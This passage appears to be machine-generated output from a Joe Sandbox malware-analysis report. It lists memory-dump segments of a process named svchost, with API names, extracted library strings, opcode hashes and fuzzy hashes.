            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: _errnorealloc
            • String ID:
            • API String ID: 3650671883-0
            • Opcode ID: bdd0e6abeca3baa7d21ed68e019c67173be07a59379de568f70bcf34bb2b9ef9
            • Instruction ID: e6ee4a582ad34783fbcadd2d6336356e8e1fd09c990db6dfb05e23014d8f1b0d
            • Opcode Fuzzy Hash: bdd0e6abeca3baa7d21ed68e019c67173be07a59379de568f70bcf34bb2b9ef9
            • Instruction Fuzzy Hash: 2671EEB274568D8ADF14DF6AC4547A937A1BB09BDDFC04A22DE7A47BD4DB38C0898300
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID:
            • String ID: was still active.$ while $, but got null pointer instead.$; expected to close $Closed $Closed while not open: $Could not copy string: buffer too small. $Expected to close $Null pointer registered.$Started new $Started twice:
            • API String ID: 0-1200026772
            • Opcode ID: 7f5a265fc4a22e81f92ce1bf5ddf6055b8cfea8561133b55d6f9cf4d7d04a184
            • Instruction ID: 2a9c3dcbe1f2affbbae3b2368bfbb23f3c2d9c3d8dff81e9e71bdf3871070d19
            • Opcode Fuzzy Hash: 7f5a265fc4a22e81f92ce1bf5ddf6055b8cfea8561133b55d6f9cf4d7d04a184
            • Instruction Fuzzy Hash: 51F1B162B1CA86A5EB13EF64E4413E96360FF56788F909132EA4D0366AFF3CE145C740
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID:
            • String ID: aborted after going into indeterminate state; it may have been executed anyway.$ was never closed properly!$Attempt to abort previously committed $UNPROCESSED ERROR: $Warning: $transaction$JT
            • API String ID: 0-522228489
            • Opcode ID: af2e65eb15c6bbe6b80f3051c97c81a05197d5e2f73e88e5e2e891247e8c97d9
            • Instruction ID: 46f5afcbd5b26ce3fea201bcd4b77055b38561b4ca3bbf5c7456e6b4708c35bf
            • Opcode Fuzzy Hash: af2e65eb15c6bbe6b80f3051c97c81a05197d5e2f73e88e5e2e891247e8c97d9
            • Instruction Fuzzy Hash: 85D18572B0CB8581EB12AB25E04437D6365FB56B98F608231DA9C07BA9EF7CE585C740
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Xinvalid_argumentstd::_
            • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Missing '}' in format string.$Number is too big$Unknown format specifier.
            • API String ID: 909987262-3302395901
            • Opcode ID: 654ada2351dd412e7b42ecaabb5c746f4456bbc99ee7c0637db2948bc8c4c4c0
            • Instruction ID: eff8d5c2e6b330b7ddb1bac29fe4c0fccde6012121758a7b58db92a47c2f57e6
            • Opcode Fuzzy Hash: 654ada2351dd412e7b42ecaabb5c746f4456bbc99ee7c0637db2948bc8c4c4c0
            • Instruction Fuzzy Hash: C4A17E22B08A46CAE712EF64D4442FD33B5EB55788F408632DB4E236AAEF38D556C744
            APIs
            • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 682832D1
            • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 68283381
            • abort.MSVCRT ref: 682833EF
            • pthread_rwlock_wrlock.LIBWINPTHREAD-1 ref: 6828341A
            • free.MSVCRT ref: 6828345B
            • pthread_rwlock_unlock.LIBWINPTHREAD-1 ref: 68283467
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: abortfreepthread_mutex_lockpthread_mutex_unlockpthread_rwlock_unlockpthread_rwlock_wrlock
            • String ID: 8`)h$@`)h$c:/pgBuild64/share/locale
            • API String ID: 3379943660-3689085214
            • Opcode ID: 81afa4b7123b088a623e5ef584f2d6df36a93d5f6ab68d04874ba304e0dfd4de
            • Instruction ID: cafc0ba0edcefb4b94de35a7e00dbc7d41b28b4e68cd82c72fe0e5fa22b6ecd6
            • Opcode Fuzzy Hash: 81afa4b7123b088a623e5ef584f2d6df36a93d5f6ab68d04874ba304e0dfd4de
            • Instruction Fuzzy Hash: BC519FB170574FC1EF158F1BE8683A923A2BB45FC9FC88225CE6957394EF29C0698340
            APIs
            • VirtualQuery.KERNEL32(?,?,?,?,?,682960F4,?,?,?,?,?,?,68281315), ref: 6828CE94
            • VirtualProtect.KERNEL32(?,?,?,?,?,682960F4,?,?,?,?,?,?,68281315), ref: 6828CEB6
            Strings
            • Unknown pseudo relocation bit size %d., xrefs: 6828CF6A
            • Unknown pseudo relocation protocol version %d., xrefs: 6828CFCA
            • VirtualQuery failed for %d bytes at address %p, xrefs: 6828CCBA, 6828CFB3
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: Virtual$ProtectQuery
            • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$ VirtualQuery failed for %d bytes at address %p
            • API String ID: 1027372294-974437099
            • Opcode ID: 2752f869f49eda997246e6d9b4ac340988e297aacd72a7d5716d20230ee3a07e
            • Instruction ID: 7848499f30e46e56733167479c57ee5d6fc3df53bbe755c731f941633a4f6d41
            • Opcode Fuzzy Hash: 2752f869f49eda997246e6d9b4ac340988e297aacd72a7d5716d20230ee3a07e
            • Instruction Fuzzy Hash: ECA122F670060A8AEF549B7AD8507596363BB85BA9FD4C612CD29477D8CB3EC48E8301
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Xinvalid_argumentstd::_
            • String ID: Format specifier requires numeric argument.$Format specifier requires numeric or pointer argument.$Invalid format string.$Missing precision specifier.$Number is too big$Precision not allowed for this argument type.
            • API String ID: 909987262-255851600
            • Opcode ID: 0f36b4f91cfe552b0b332fe34d1677c8ff5a8c60b8c0a52a4a4efd33c6d47dde
            • Instruction ID: 7ae3f31d1acebf7716d4d69aeba2ccb5cf58abec022f5c5f284e8b3fd6dea5af
            • Opcode Fuzzy Hash: 0f36b4f91cfe552b0b332fe34d1677c8ff5a8c60b8c0a52a4a4efd33c6d47dde
            • Instruction Fuzzy Hash: 9C71A722E0C18985EF67BB09E1546B827B0DB93784F98D831D74D076E3DB6CE5E18B48
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Handle$Close$File$ErrorLast$CopyCreate$Information
            • String ID:
            • API String ID: 1679173910-0
            • Opcode ID: 4536d9a9ef9bc617ba03928a9dbe05ca07202005cbdee773ced15659da7c701a
            • Instruction ID: 348df96b1d70706092b05b39a3d2ca6d2e7178b6a0a96c67d9d77d33c564c85d
            • Opcode Fuzzy Hash: 4536d9a9ef9bc617ba03928a9dbe05ca07202005cbdee773ced15659da7c701a
            • Instruction Fuzzy Hash: 0C816321F0C6424AF763AB79944027D26A1AB06BB8F148739DD7D47AE6EF38F505C390
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: setlocalestrchrstrcmpstrlenstrrchr
            • String ID: ASCII$CP%s$CP%u$CP936
            • API String ID: 2840338844-1692024362
            • Opcode ID: 182277ec904048f4833963a75aa617e9bd8b241e25b6d7fc156e65e334356766
            • Instruction ID: c7600fd9c23a00d7e0e9bebd6c13a976c1e8ce6dfdd5acbcd16871e33a0f6ef2
            • Opcode Fuzzy Hash: 182277ec904048f4833963a75aa617e9bd8b241e25b6d7fc156e65e334356766
            • Instruction Fuzzy Hash: D62104A630568E94EF188F27E9143A523A2AB45B88FCC8535CD2F07394EF2DC458C710
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+
            • String ID:
            • API String ID: 2943138195-0
            • Opcode ID: 5afc6738595246fa41d918036c2846ac39f96e9284b5c1df2419746a3cd2cb07
            • Instruction ID: eda9a11cdd1257fcd75e17ead01b04823a125ed7aa505dedb7fb628d6a7590e3
            • Opcode Fuzzy Hash: 5afc6738595246fa41d918036c2846ac39f96e9284b5c1df2419746a3cd2cb07
            • Instruction Fuzzy Hash: E6F18B36F0CA829AE703EF64D4901FC37A5EB5634CB408436DA0D67AAADF38E559C740
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: NameName::$Name::operator+
            • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
            • API String ID: 826178784-2441609178
            • Opcode ID: 51cfbc52ead9d6b7089eed2ef22e23e23b5873e6bf8bcb9a4d8ab1048defd61b
            • Instruction ID: 19a9c1a0c161ad4f93cf99f1dde804ba1d18524dddd562e4d9b6f7d7f7983d98
            • Opcode Fuzzy Hash: 51cfbc52ead9d6b7089eed2ef22e23e23b5873e6bf8bcb9a4d8ab1048defd61b
            • Instruction Fuzzy Hash: 42F16922F0C61284FB57BF64C9941BCA7A1EF5778CF44C136CA4E26AB6DE3CB5058251
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
            • String ID: C:\(universalsvc) Service DLL\universalsvc\packages\include\nlohmann\json.hpp$buf[len - 1] != '0'$create_directory$dist <= delta$len >= 1$remove$rest <= delta$ten_k > 0
            • API String ID: 3936042273-4027473493
            • Opcode ID: 3cd59a85e8101090ef8019caa2101bee5f301fc048f74abae58f375a43937c83
            • Instruction ID: 2fa893ad22f5a3a963e52f5fa49f53eb4116d698a413378db807f73ec1a40921
            • Opcode Fuzzy Hash: 3cd59a85e8101090ef8019caa2101bee5f301fc048f74abae58f375a43937c83
            • Instruction Fuzzy Hash: CA91E562B1CB8A41EF13EB62E4401796761EB46BE4F648635EA5D07BE6DF6CF481C300
            APIs
            • pthread_rwlock_rdlock.LIBWINPTHREAD-1 ref: 68281966
            • strlen.MSVCRT ref: 68281977
              • Part of subcall function 68283500: strlen.MSVCRT ref: 68283575
              • Part of subcall function 68283500: strlen.MSVCRT ref: 68283598
              • Part of subcall function 68283500: strlen.MSVCRT ref: 682835BA
              • Part of subcall function 68283500: strlen.MSVCRT ref: 682835DB
              • Part of subcall function 68283500: strlen.MSVCRT ref: 682835F7
              • Part of subcall function 68283500: strlen.MSVCRT ref: 68283603
              • Part of subcall function 68283500: malloc.MSVCRT ref: 68283612
            • pthread_rwlock_unlock.LIBWINPTHREAD-1 ref: 682819D9
            • _strdup.MSVCRT ref: 68281A73
            • pthread_rwlock_wrlock.LIBWINPTHREAD-1 ref: 68281AC8
            • strlen.MSVCRT ref: 68281AD9
            • pthread_rwlock_unlock.LIBWINPTHREAD-1 ref: 68281B43
            • free.MSVCRT ref: 68281B64
            • free.MSVCRT ref: 68281B7B
            • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,POSIX,?,?,6829FC06), ref: 68281BC8
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: strlen$freepthread_rwlock_unlock$_strdupabortmallocpthread_rwlock_rdlockpthread_rwlock_wrlock
            • String ID: POSIX
            • API String ID: 2621910772-397921758
            • Opcode ID: 8b4f2b39b8d97997c3be6eff95473a80323d59d398344c685dff2fea4de45433
            • Instruction ID: aa5b84106ae72cb9e6c5de2ac422163aa92ff2da87194c78adeb97b4ad97f57b
            • Opcode Fuzzy Hash: 8b4f2b39b8d97997c3be6eff95473a80323d59d398344c685dff2fea4de45433
            • Instruction Fuzzy Hash: F3517EB6305A4985EF24CB16E85476AB3A4FB85BC5FC48225DEB947BD4EF38C089C700
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: realloc
            • String ID:
            • API String ID: 471065373-0
            • Opcode ID: 1bd1ad42625a25576ddee770d907f277b401a28359c31fbf83a96b83cbae493f
            • Instruction ID: 8ecf840fec1bc17a237b0d567b5a045c17d8e3f7fdeb30295c86988d4f35b1c4
            • Opcode Fuzzy Hash: 1bd1ad42625a25576ddee770d907f277b401a28359c31fbf83a96b83cbae493f
            • Instruction Fuzzy Hash: 1C7160B7A01B8D89DF108FAAD45029C23B1F748B98F814A26DE7E67BD8DF34C1958351
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: FileHandle$ErrorInformationLast$Close__std_fs_open_handle$CreateFeatureMovePresentProcessor_invalid_parameter_noinfo
            • String ID:
            • API String ID: 4246490064-0
            • Opcode ID: c2bdbfb8884f53fee82588d9c5f359d968644dc67c428822b3156ac7b55f4487
            • Instruction ID: 8761b6bd9cc7ad3ab35bd1dab25c8e61d301222c0dc08ab2b2a907b038ad94e8
            • Opcode Fuzzy Hash: c2bdbfb8884f53fee82588d9c5f359d968644dc67c428822b3156ac7b55f4487
            • Instruction Fuzzy Hash: B6619121F0C34289F723AFB598055BD26A1EF467ACF648235CD1E96AE4DF29F441C710
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: std::_$Lockit$Lockit::_Lockit::~__invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFacet_RegisterXinvalid_argument
            • String ID: integral cannot be stored in wchar_t
            • API String ID: 3363080787-1689078516
            • Opcode ID: 649e0f73ad288bdad85242fbc33052c03429710de04f2dcba5317f1c0d0e830e
            • Instruction ID: dc8a9986d1ab7f5163670b372cda800fe291d8bca14da9b8bb717c67e162d2ca
            • Opcode Fuzzy Hash: 649e0f73ad288bdad85242fbc33052c03429710de04f2dcba5317f1c0d0e830e
            • Instruction Fuzzy Hash: 2302D262A0C78585FB13EB64E5402BC77B1FB86798F548631DA8D13AA6DF3CE481CB04
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID: ; expected $; last read: '$syntax error $unexpected $while parsing
            • API String ID: 3668304517-4239264347
            • Opcode ID: f9aa77f71ea7ba2770eacd87e46acd28db4e9bfa7eecfb8b46f91a0c1d743d95
            • Instruction ID: 8ecb68622a797f9dcc81da901b653a7385ad4fc205fa4b3eac770c845c6096ac
            • Opcode Fuzzy Hash: f9aa77f71ea7ba2770eacd87e46acd28db4e9bfa7eecfb8b46f91a0c1d743d95
            • Instruction Fuzzy Hash: 76E1DC62F1868589FB12ABA1C4403ED2772EB467E8F508235DE1D1BAEBDF78D481C744
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$EntryInterlockedListNamePush__un
            • String ID: #$', stored '$', trying to retrieve '$NameValuePairs: type mismatch for '
            • API String ID: 4073222981-3687095204
            • Opcode ID: 00287a3abf2aa9fb01015fcbd90881ea487059c7da2b0eacd4a9c17f68b32d84
            • Instruction ID: 99385be45c569170a2793b51308ea6b74d93987821e75dc02274ea4391472c8a
            • Opcode Fuzzy Hash: 00287a3abf2aa9fb01015fcbd90881ea487059c7da2b0eacd4a9c17f68b32d84
